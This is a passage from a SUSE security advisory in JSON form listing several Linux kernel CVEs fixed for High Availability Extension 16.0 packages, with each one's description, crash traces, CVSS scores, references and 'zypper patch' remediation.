"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-40147"
},
{
"cve": "CVE-2025-40195",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40195"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmount: handle NULL values in mnt_ns_release()\n\nWhen calling in listmount() mnt_ns_release() may be passed a NULL\npointer. Handle that case gracefully.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40195",
"url": "https://www.suse.com/security/cve/CVE-2025-40195"
},
{
"category": "external",
"summary": "SUSE Bug 1253500 for CVE-2025-40195",
"url": "https://bugzilla.suse.com/1253500"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-40195"
},
{
"cve": "CVE-2025-40257",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40257"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix a race in mptcp_pm_del_add_timer()\n\nmptcp_pm_del_add_timer() can call sk_stop_timer_sync(sk, \u0026entry-\u003eadd_timer)\nwhile another might have free entry already, as reported by syzbot.\n\nAdd RCU protection to fix this issue.\n\nAlso change confusing add_timer variable with stop_timer boolean.\n\nsyzbot report:\n\nBUG: KASAN: slab-use-after-free in __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\nRead of size 4 at addr ffff8880311e4150 by task kworker/1:1/44\n\nCPU: 1 UID: 0 PID: 44 Comm: kworker/1:1 Not tainted syzkaller #0 PREEMPT_{RT,(full)}\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025\nWorkqueue: events mptcp_worker\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\n sk_stop_timer_sync+0x1b/0x90 net/core/sock.c:3631\n mptcp_pm_del_add_timer+0x283/0x310 net/mptcp/pm.c:362\n mptcp_incoming_options+0x1357/0x1f60 net/mptcp/options.c:1174\n tcp_data_queue+0xca/0x6450 net/ipv4/tcp_input.c:5361\n tcp_rcv_established+0x1335/0x2670 net/ipv4/tcp_input.c:6441\n tcp_v4_do_rcv+0x98b/0xbf0 net/ipv4/tcp_ipv4.c:1931\n tcp_v4_rcv+0x252a/0x2dc0 net/ipv4/tcp_ipv4.c:2374\n ip_protocol_deliver_rcu+0x221/0x440 net/ipv4/ip_input.c:205\n ip_local_deliver_finish+0x3bb/0x6f0 net/ipv4/ip_input.c:239\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n __netif_receive_skb_one_core net/core/dev.c:6079 [inline]\n __netif_receive_skb+0x143/0x380 net/core/dev.c:6192\n process_backlog+0x31e/0x900 net/core/dev.c:6544\n __napi_poll+0xb6/0x540 net/core/dev.c:7594\n napi_poll net/core/dev.c:7657 [inline]\n net_rx_action+0x5f7/0xda0 net/core/dev.c:7784\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n __local_bh_enable_ip+0x1a0/0x2e0 kernel/softirq.c:302\n mptcp_pm_send_ack net/mptcp/pm.c:210 [inline]\n mptcp_pm_addr_send_ack+0x41f/0x500 net/mptcp/pm.c:-1\n mptcp_pm_worker+0x174/0x320 net/mptcp/pm.c:1002\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nAllocated by task 44:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n poison_kmalloc_redzone mm/kasan/common.c:400 [inline]\n __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:417\n kasan_kmalloc include/linux/kasan.h:262 [inline]\n __kmalloc_cache_noprof+0x1ef/0x6c0 mm/slub.c:5748\n kmalloc_noprof include/linux/slab.h:957 [inline]\n mptcp_pm_alloc_anno_list+0x104/0x460 net/mptcp/pm.c:385\n mptcp_pm_create_subflow_or_signal_addr+0xf9d/0x1360 net/mptcp/pm_kernel.c:355\n mptcp_pm_nl_fully_established net/mptcp/pm_kernel.c:409 [inline]\n __mptcp_pm_kernel_worker+0x417/0x1ef0 net/mptcp/pm_kernel.c:1529\n mptcp_pm_worker+0x1ee/0x320 net/mptcp/pm.c:1008\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n\nFreed by task 6630:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n __kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:587\n kasan_save_free_info mm/kasan/kasan.h:406 [inline]\n poison_slab_object m\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40257",
"url": "https://www.suse.com/security/cve/CVE-2025-40257"
},
{
"category": "external",
"summary": "SUSE Bug 1254842 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "external",
"summary": "SUSE Bug 1257242 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1257242"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "important"
}
],
"title": "CVE-2025-40257"
},
{
"cve": "CVE-2025-40259",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40259"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: sg: Do not sleep in atomic context\n\nsg_finish_rem_req() calls blk_rq_unmap_user(). The latter function may\nsleep. Hence, call sg_finish_rem_req() with interrupts enabled instead\nof disabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40259",
"url": "https://www.suse.com/security/cve/CVE-2025-40259"
},
{
"category": "external",
"summary": "SUSE Bug 1254845 for CVE-2025-40259",
"url": "https://bugzilla.suse.com/1254845"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-40259"
},
{
"cve": "CVE-2025-40261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl()\n\nnvme_fc_delete_assocation() waits for pending I/O to complete before\nreturning, and an error can cause -\u003eioerr_work to be queued after\ncancel_work_sync() had been called. Move the call to cancel_work_sync() to\nbe after nvme_fc_delete_association() to ensure -\u003eioerr_work is not running\nwhen the nvme_fc_ctrl object is freed. Otherwise the following can occur:\n\n[ 1135.911754] list_del corruption, ff2d24c8093f31f8-\u003enext is NULL\n[ 1135.917705] ------------[ cut here ]------------\n[ 1135.922336] kernel BUG at lib/list_debug.c:52!\n[ 1135.926784] Oops: invalid opcode: 0000 [#1] SMP NOPTI\n[ 1135.931851] CPU: 48 UID: 0 PID: 726 Comm: kworker/u449:23 Kdump: loaded Not tainted 6.12.0 #1 PREEMPT(voluntary)\n[ 1135.943490] Hardware name: Dell Inc. PowerEdge R660/0HGTK9, BIOS 2.5.4 01/16/2025\n[ 1135.950969] Workqueue: 0x0 (nvme-wq)\n[ 1135.954673] RIP: 0010:__list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1135.961041] Code: c7 c7 98 68 72 94 e8 26 45 fe ff 0f 0b 48 c7 c7 70 68 72 94 e8 18 45 fe ff 0f 0b 48 89 fe 48 c7 c7 80 69 72 94 e8 07 45 fe ff \u003c0f\u003e 0b 48 89 d1 48 c7 c7 a0 6a 72 94 48 89 c2 e8 f3 44 fe ff 0f 0b\n[ 1135.979788] RSP: 0018:ff579b19482d3e50 EFLAGS: 00010046\n[ 1135.985015] RAX: 0000000000000033 RBX: ff2d24c8093f31f0 RCX: 0000000000000000\n[ 1135.992148] RDX: 0000000000000000 RSI: ff2d24d6bfa1d0c0 RDI: ff2d24d6bfa1d0c0\n[ 1135.999278] RBP: ff2d24c8093f31f8 R08: 0000000000000000 R09: ffffffff951e2b08\n[ 1136.006413] R10: ffffffff95122ac8 R11: 0000000000000003 R12: ff2d24c78697c100\n[ 1136.013546] R13: fffffffffffffff8 R14: 0000000000000000 R15: ff2d24c78697c0c0\n[ 1136.020677] FS: 0000000000000000(0000) GS:ff2d24d6bfa00000(0000) knlGS:0000000000000000\n[ 1136.028765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 1136.034510] CR2: 00007fd207f90b80 CR3: 000000163ea22003 CR4: 0000000000f73ef0\n[ 1136.041641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 1136.048776] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[ 1136.055910] PKRU: 55555554\n[ 1136.058623] Call Trace:\n[ 1136.061074] \u003cTASK\u003e\n[ 1136.063179] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.067540] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.071898] ? move_linked_works+0x4a/0xa0\n[ 1136.075998] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.081744] ? __die_body.cold+0x8/0x12\n[ 1136.085584] ? die+0x2e/0x50\n[ 1136.088469] ? do_trap+0xca/0x110\n[ 1136.091789] ? do_error_trap+0x65/0x80\n[ 1136.095543] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.101289] ? exc_invalid_op+0x50/0x70\n[ 1136.105127] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.110874] ? asm_exc_invalid_op+0x1a/0x20\n[ 1136.115059] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.120806] move_linked_works+0x4a/0xa0\n[ 1136.124733] worker_thread+0x216/0x3a0\n[ 1136.128485] ? __pfx_worker_thread+0x10/0x10\n[ 1136.132758] kthread+0xfa/0x240\n[ 1136.135904] ? __pfx_kthread+0x10/0x10\n[ 1136.139657] ret_from_fork+0x31/0x50\n[ 1136.143236] ? __pfx_kthread+0x10/0x10\n[ 1136.146988] ret_from_fork_asm+0x1a/0x30\n[ 1136.150915] \u003c/TASK\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40261",
"url": "https://www.suse.com/security/cve/CVE-2025-40261"
},
{
"category": "external",
"summary": "SUSE Bug 1254839 for CVE-2025-40261",
"url": "https://bugzilla.suse.com/1254839"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-40261"
},
{
"cve": "CVE-2025-40363",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40363"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipv6: fix field-spanning memcpy warning in AH output\n\nFix field-spanning memcpy warnings in ah6_output() and\nah6_output_done() where extension headers are copied to/from IPv6\naddress fields, triggering fortify-string warnings about writes beyond\nthe 16-byte address fields.\n\n memcpy: detected field-spanning write (size 40) of single field \"\u0026top_iph-\u003esaddr\" at net/ipv6/ah6.c:439 (size 16)\n WARNING: CPU: 0 PID: 8838 at net/ipv6/ah6.c:439 ah6_output+0xe7e/0x14e0 net/ipv6/ah6.c:439\n\nThe warnings are false positives as the extension headers are\nintentionally placed after the IPv6 header in memory. Fix by properly\ncopying addresses and extension headers separately, and introduce\nhelper functions to avoid code duplication.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40363",
"url": "https://www.suse.com/security/cve/CVE-2025-40363"
},
{
"category": "external",
"summary": "SUSE Bug 1255102 for CVE-2025-40363",
"url": "https://bugzilla.suse.com/1255102"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
